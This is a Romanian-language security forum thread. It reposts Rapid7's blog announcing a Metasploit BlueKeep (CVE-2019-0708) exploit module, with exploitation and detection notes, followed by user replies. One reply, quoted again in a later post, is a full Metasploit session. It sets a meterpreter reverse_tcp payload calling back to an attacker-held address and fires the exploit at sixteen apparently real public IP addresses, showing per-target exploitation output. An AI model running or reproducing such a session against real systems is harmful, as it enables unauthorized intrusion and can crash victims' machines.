Jump to content
Nytro

Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708)

Recommended Posts

Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708)

by Brent Cook

Sep 06, 2019BlueKeep.jpg

Today, Metasploit is releasing an initial public exploit module for CVE-2019-0708, also known as BlueKeep, as a pull request on Metasploit Framework. The initial PR of the exploit module targets 64-bit versions of Windows 7 and Windows 2008 R2. The module builds on proof-of-concept code from Metasploit contributor @zerosum0x0, who also contributed Metasploit’s BlueKeep scanner module and the scanner and exploit modules for EternalBlue. Metasploit’s exploit makes use of an improved general-purpose RDP protocol library, as well as enhanced RDP fingerprinting capabilities, both of which will benefit Metasploit users and contributors well beyond the context of BlueKeep scanning and exploitation.

As an open-source project, one of Metasploit’s guiding principles is that knowledge is most powerful when shared. Democratic access to attacker capabilities, including exploits, is critical for defenders—particularly those who rely on open-source tooling to understand and effectively mitigate risk.

Exploitation notes

By default, Metasploit’s BlueKeep exploit only identifies the target operating system version and whether the target is likely to be vulnerable. The exploit does not currently support automatic targeting; it requires the user to manually specify target details before it will attempt further exploitation. If the module is interrupted during exploitation, or if the incorrect target is specified, the target will crash with a bluescreen. Users should also note that some elements of the exploit require knowledge of how Windows kernel memory is laid out, which varies depending on both OS version and the underlying host platform (virtual or physical); the user currently needs to specify this correctly to run the exploit successfully. Server versions of Windows also require a non-default configuration for successful exploitation—namely, changing a registry setting to enable audio sharing. This limitation may be removed in the future.

One of the drivers in our releasing the exploit code today as a PR on Metasploit Framework is to enlist the help of the global developer and user community to test, verify, and extend reliability across target environments. As with many Metasploit exploits whose utility has endured over the years, we expect to continue refining the BlueKeep exploit over time. We look forward to working with the Metasploit community to add support for automatic targeting, improve reliability, and expand the range of possible targets. In addition to PoC contributors @zerosum0x0 and @ryHanson, we owe many (many!) enthusiastic thanks to @TheColonial, [@rickoates],(https://twitter.com/rickoates) @zeroSteiner, @TomSellers, @wvu, @bwatters, @sinn3r, and the rest of the Metasploit development team for their invaluable assistance and leadership on development (which included an extensive port of zerosum0x0’s original Python exploit code to Ruby), testing, and integration. New folks interested in joining the list of testers and contributors can get started here!

Detection and solution notes

Defenders may want to note that BlueKeep exploitation looks similar to a BlueKeep vulnerability scanner at the network level. If your network IDS/IPS is already able to detect the scanner sequence, it almost certainly detects the exploit as well. For host-based IDS/IPS users, the kernel shellcode loads a child process to the Windows process spoolsv.exe by default, which is a similar indicator of compromise to exploits such as EternalBlue (MS17-010).

All that said, there's one important caveat for Metasploit payload detection tools, such as those that alert on generic meterpreter payloads in network traffic: If an intrusion prevention system interrupts in-progress BlueKeep exploitation simply because it detects a payload signature against an unpatched target, breaking that network connection will likely crash the target as a side effect, since the exploit code is actually triggered by a network disconnect. Because of this, users are urged to test their IPS against this Metasploit module once the PR is merged into the Framework master branch.

While specific defenses and detection against this particular exploit are useful, newer RDP vulnerabilities in the ‘DejaBlue’ family have underscored this protocol in general as a risk. The protocol’s inherent complexity suggests that the known bugs today will not be the last, particularly since exploit developers and researchers now have a more nuanced understanding of RDP and its weaknesses. Continued exploitation is likely, as is increased exploit sophistication. If you still need to use RDP in your environment, then in addition to standard recommendations such as enabling Network Level Authentication, tightening your network access controls will also go a long way toward mitigating future vulnerabilities.

The broader security community has emphasized the importance and urgency of patching against CVE-2019-0708. We echo this advice: Rapid7 Labs has previously written about the uptick in malicious RDP activity they have observed since the publication of the BlueKeep vulnerability.

BlueKeep-1.png

Rapid7 Labs has not observed an increased barrage of incoming attacks against RDP past the initial uptick in malicious activity after BlueKeep was published. The chart above looks similar to the Labs team’s previous report on RDP and while activity is at elevated levels when compared to a year ago, overall opportunistic attacker activity is much lower than we expected to see by this point in the post-vulnerability release cycle. Our research partners at BinaryEdge have up-to-date scan results for systems vulnerable to BlueKeep and have indicated they are still observing just over 1 million exposed nodes.

For profiles of attacker activity and detailed recommendations on defending against BlueKeep exploitation, see Rapid7’s previous analysis here.

About Metasploit and Rapid7

Metasploit is a collaboration between Rapid7 and the open-source community. Together, we empower defenders with world-class offensive security content and the ability to understand, exploit, and share vulnerabilities. For more information, see https://www.metasploit.com.

 

Sursa: https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/amp/?__twitter_impression=true

  • Upvote 2

Share this post


Link to post
Share on other sites

Interesanta aceasta chestie. Vreau sa fac un tutorial mai detaliat pe forum despre cum se exploateaza :)

  • Upvote 1

Share this post


Link to post
Share on other sites
19 hours ago, mDOS said:

Interesanta aceasta chestie. Vreau sa fac un tutorial mai detaliat pe forum despre cum se exploateaza :)

set rhosts && run? :))

Share this post


Link to post
Share on other sites
7 minutes ago, BiosHell said:

set rhosts && run? :))

Da ma da vreau sa il fac si eu mai explicit :)

Share this post


Link to post
Share on other sites

poti sa te pisi pe el exploit, nu e bun de nimic

 

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST 185.xxx.xxx.165
LHOST => 185.xxx.xxx.165
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4443
LPORT => 4443
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     185.xxx.xxx.165  yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 1
TARGET => 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.21
2.162 139.199.86.136 109.145.192.146 148.70.11.71 110.166.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53
RHOSTS => 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.212.162 139.199.86.136 109.145.192.146 148.70.11.71 110.16
6.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 14.141.169.229

[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 14.141.169.229:3389   - Detected RDP on 14.141.169.229:3389   (Windows version: 6.0.6003) (Requires NLA: No)
[+] 14.141.169.229:3389   - The target is vulnerable.
[*] 14.141.169.229:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 14.141.169.229:3389 - Surfing channels ...
[*] 14.141.169.229:3389 - Lobbing eggs ...
[-] 14.141.169.229:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 211.159.157.90
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 211.159.157.90:3389   - Detected RDP on 211.159.157.90:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 211.159.157.90:3389   - The target is vulnerable.
[*] 211.159.157.90:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 211.159.157.90:3389 - Surfing channels ...
[-] 211.159.157.90:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 106.12.134.221
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 106.12.134.221:3389   - Detected RDP on 106.12.134.221:3389   (Windows version: N/A) (Requires NLA: No)
[*] 106.12.134.221:3389   - Cannot reliably check exploitability.
[-] 106.12.134.221:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 213.229.36.215
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 213.229.36.215:3389   - Detected RDP on 213.229.36.215:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 213.229.36.215:3389   - The target is vulnerable.
[*] 213.229.36.215:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 213.229.36.215:3389 - Surfing channels ...
[*] 213.229.36.215:3389 - Lobbing eggs ...
[-] 213.229.36.215:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 1.197.204.56
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 1.197.204.56:3389     - The target service is not running or refused our connection.
[-] 1.197.204.56:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 101.91.228.185
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 101.91.228.185:3389   - Detected RDP on 101.91.228.185:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 101.91.228.185:3389   - The target is vulnerable.
[*] 101.91.228.185:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 101.91.228.185:3389 - Surfing channels ...
[*] 101.91.228.185:3389 - Lobbing eggs ...
[-] 101.91.228.185:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 23.249.16.157
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 23.249.16.157:3389    - Detected RDP on 23.249.16.157:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 23.249.16.157:3389    - The target is vulnerable.
[*] 23.249.16.157:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 23.249.16.157:3389 - Surfing channels ...
[*] 23.249.16.157:3389 - Lobbing eggs ...
[-] 23.249.16.157:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 177.43.212.162
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 177.43.212.162:3389   - Detected RDP on 177.43.212.162:3389   (Windows version: N/A) (Requires NLA: No)
[+] 177.43.212.162:3389   - The target is vulnerable.
[-] 177.43.212.162:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError
[*] Exploiting target 139.199.86.136
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 139.199.86.136:3389   - Detected RDP on 139.199.86.136:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 139.199.86.136:3389   - The target is vulnerable.
[*] 139.199.86.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 139.199.86.136:3389 - Surfing channels ...
[-] 139.199.86.136:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 109.145.192.146
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 109.145.192.146:3389  - Detected RDP on 109.145.192.146:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 109.145.192.146:3389  - The target is vulnerable.
[*] 109.145.192.146:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 109.145.192.146:3389 - Surfing channels ...
[*] 109.145.192.146:3389 - Lobbing eggs ...
[-] 109.145.192.146:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 148.70.11.71
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 148.70.11.71:3389     - Detected RDP on 148.70.11.71:3389     (Windows version: 6.1.7601) (Requires NLA: No)
[+] 148.70.11.71:3389     - The target is vulnerable.
[*] 148.70.11.71:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 148.70.11.71:3389 - Surfing channels ...
[-] 148.70.11.71:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 110.166.254.99
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 110.166.254.99:3389   - Cannot reliably check exploitability.
[-] 110.166.254.99:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 132.232.224.174
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 132.232.224.174:3389  - Cannot reliably check exploitability.
[-] 132.232.224.174:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 101.89.112.158
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 101.89.112.158:3389   - Detected RDP on 101.89.112.158:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 101.89.112.158:3389   - The target is vulnerable.
[*] 101.89.112.158:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 101.89.112.158:3389 - Surfing channels ...
[-] 101.89.112.158:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 50.247.84.178
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 50.247.84.178:3389    - Detected RDP on 50.247.84.178:3389    (Windows version: 6.0.6002) (Requires NLA: No)
[+] 50.247.84.178:3389    - The target is vulnerable.
[*] 50.247.84.178:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 50.247.84.178:3389 - Surfing channels ...
[*] 50.247.84.178:3389 - Lobbing eggs ...
[-] 50.247.84.178:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 118.24.118.53
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 118.24.118.53:3389    - Detected RDP on 118.24.118.53:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 118.24.118.53:3389    - The target is vulnerable.
[*] 118.24.118.53:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 118.24.118.53:3389 - Surfing channels ...
[-] 118.24.118.53:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

 

  • Upvote 2

Share this post


Link to post
Share on other sites

Da, nu e tocmai fiabil, e open-source. Probabil sunt versiuni mult mai stabile, desi nu cred ca 100%. 

Share this post


Link to post
Share on other sites
31 minutes ago, joeyjoe said:

poti sa te pisi pe el exploit, nu e bun de nimic

 


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST 185.xxx.xxx.165
LHOST => 185.xxx.xxx.165
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4443
LPORT => 4443
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     185.xxx.xxx.165  yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 1
TARGET => 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.21
2.162 139.199.86.136 109.145.192.146 148.70.11.71 110.166.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53
RHOSTS => 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.212.162 139.199.86.136 109.145.192.146 148.70.11.71 110.16
6.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 14.141.169.229

[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 14.141.169.229:3389   - Detected RDP on 14.141.169.229:3389   (Windows version: 6.0.6003) (Requires NLA: No)
[+] 14.141.169.229:3389   - The target is vulnerable.
[*] 14.141.169.229:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 14.141.169.229:3389 - Surfing channels ...
[*] 14.141.169.229:3389 - Lobbing eggs ...
[-] 14.141.169.229:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 211.159.157.90
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 211.159.157.90:3389   - Detected RDP on 211.159.157.90:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 211.159.157.90:3389   - The target is vulnerable.
[*] 211.159.157.90:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 211.159.157.90:3389 - Surfing channels ...
[-] 211.159.157.90:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 106.12.134.221
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 106.12.134.221:3389   - Detected RDP on 106.12.134.221:3389   (Windows version: N/A) (Requires NLA: No)
[*] 106.12.134.221:3389   - Cannot reliably check exploitability.
[-] 106.12.134.221:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 213.229.36.215
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 213.229.36.215:3389   - Detected RDP on 213.229.36.215:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 213.229.36.215:3389   - The target is vulnerable.
[*] 213.229.36.215:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 213.229.36.215:3389 - Surfing channels ...
[*] 213.229.36.215:3389 - Lobbing eggs ...
[-] 213.229.36.215:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 1.197.204.56
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 1.197.204.56:3389     - The target service is not running or refused our connection.
[-] 1.197.204.56:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 101.91.228.185
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 101.91.228.185:3389   - Detected RDP on 101.91.228.185:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 101.91.228.185:3389   - The target is vulnerable.
[*] 101.91.228.185:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 101.91.228.185:3389 - Surfing channels ...
[*] 101.91.228.185:3389 - Lobbing eggs ...
[-] 101.91.228.185:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 23.249.16.157
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 23.249.16.157:3389    - Detected RDP on 23.249.16.157:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 23.249.16.157:3389    - The target is vulnerable.
[*] 23.249.16.157:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 23.249.16.157:3389 - Surfing channels ...
[*] 23.249.16.157:3389 - Lobbing eggs ...
[-] 23.249.16.157:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 177.43.212.162
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 177.43.212.162:3389   - Detected RDP on 177.43.212.162:3389   (Windows version: N/A) (Requires NLA: No)
[+] 177.43.212.162:3389   - The target is vulnerable.
[-] 177.43.212.162:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError
[*] Exploiting target 139.199.86.136
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 139.199.86.136:3389   - Detected RDP on 139.199.86.136:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 139.199.86.136:3389   - The target is vulnerable.
[*] 139.199.86.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 139.199.86.136:3389 - Surfing channels ...
[-] 139.199.86.136:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 109.145.192.146
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 109.145.192.146:3389  - Detected RDP on 109.145.192.146:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 109.145.192.146:3389  - The target is vulnerable.
[*] 109.145.192.146:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 109.145.192.146:3389 - Surfing channels ...
[*] 109.145.192.146:3389 - Lobbing eggs ...
[-] 109.145.192.146:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 148.70.11.71
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 148.70.11.71:3389     - Detected RDP on 148.70.11.71:3389     (Windows version: 6.1.7601) (Requires NLA: No)
[+] 148.70.11.71:3389     - The target is vulnerable.
[*] 148.70.11.71:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 148.70.11.71:3389 - Surfing channels ...
[-] 148.70.11.71:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 110.166.254.99
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 110.166.254.99:3389   - Cannot reliably check exploitability.
[-] 110.166.254.99:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 132.232.224.174
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 132.232.224.174:3389  - Cannot reliably check exploitability.
[-] 132.232.224.174:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 101.89.112.158
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 101.89.112.158:3389   - Detected RDP on 101.89.112.158:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 101.89.112.158:3389   - The target is vulnerable.
[*] 101.89.112.158:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 101.89.112.158:3389 - Surfing channels ...
[-] 101.89.112.158:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 50.247.84.178
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 50.247.84.178:3389    - Detected RDP on 50.247.84.178:3389    (Windows version: 6.0.6002) (Requires NLA: No)
[+] 50.247.84.178:3389    - The target is vulnerable.
[*] 50.247.84.178:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 50.247.84.178:3389 - Surfing channels ...
[*] 50.247.84.178:3389 - Lobbing eggs ...
[-] 50.247.84.178:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 118.24.118.53
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 118.24.118.53:3389    - Detected RDP on 118.24.118.53:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 118.24.118.53:3389    - The target is vulnerable.
[*] 118.24.118.53:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 118.24.118.53:3389 - Surfing channels ...
[-] 118.24.118.53:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

 

Degeaba au facut modul cat timp el trebuie exploatat tot manual + ca este inca instabil

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...